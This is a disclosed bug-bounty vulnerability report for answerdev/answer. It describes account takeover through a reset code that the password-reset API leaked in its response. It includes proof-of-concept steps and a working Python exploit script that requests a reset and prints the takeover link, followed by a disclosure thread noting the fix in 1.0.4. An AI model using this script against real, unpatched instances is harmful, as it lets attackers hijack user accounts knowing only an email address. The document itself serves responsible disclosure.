Account Takeover via reset password in answerdev/answer

Valid

Reported on

Jan 24th 2023


Description

Password recovery leads to Account Take Over due to reset code leakage.

Proof of Concept

Create an acount in https://meta.answer.dev/ and verify mail,  then log out.

Go to password recovery (https://meta.answer.dev/users/account-recovery), insert your email and capture the server response, will be something like the following:
{"code":200,"reason":"base.success","msg":"Success.","data":"CODE"}

Copy the "data" token, then go to
https://meta.answer.dev/users/password-reset?code=[CODE]

ATO :)

Impact

Compromise any account knowing only the email address

Script

Attached this script so you don't have to use Burpsuite :)

from sys import argv
import urllib3
from requests import post

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def ato(url: list, email: str) -> str:
    try:
        return f"Your Link: {''.join(url)}users/password-reset?code=" + \
               post(f"{''.join(url)}answer/api/v1/user/password/reset", json={"e_mail": email}, verify=False).json()["data"]
    except Exception as err:
        return f"Cant reach URL: {err}"


if __name__ == "__main__":
    if len(argv) != 3:
        print(f"Usage: {argv[0]} https://answer.domain/ myemail@localhost.com")
        exit()

    print(ato([argv[1] if argv[1].endswith("/") else argv[1] + "/"], str(argv[2])))

Permalinks

Return code

Return code func definition

Response handler

We are processing your report and will contact the answerdev/answer team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
Eduardo modified the report
a year ago
Eduardo modified the report
a year ago
We have contacted a member of the answerdev/answer team and are waiting to hear back a year ago
Eduardo modified the report
a year ago
answerdev/answer maintainer validated this vulnerability a year ago
blueudp has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Eduardo
a year ago

Researcher


Thank you very much for your validation, do you need anything else at the moment?

Eduardo
a year ago

Researcher


Hello, How are you doing?

I have seen a commit where you have fixed the bug. https://github.com/answerdev/answer/commit/c1fa2b13f6b547b96da60b23350bbe2b29de542d

Could you please assign the commit with the report and assign CVE?

Thank you in advance, Best regards.

Eduardo
a year ago

Researcher


@admin no response in this thread since report validation, could you start the CVE assignment process please?

Eduardo
a year ago

Researcher


I have contacted an answerdev member privately, they want to keep the report private until the new release comes out. Is it possible to start the CVE assignment process without making the report public?

answerdev/answer maintainer marked this as fixed in 1.0.4 with commit c1fa2b a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
to join this conversation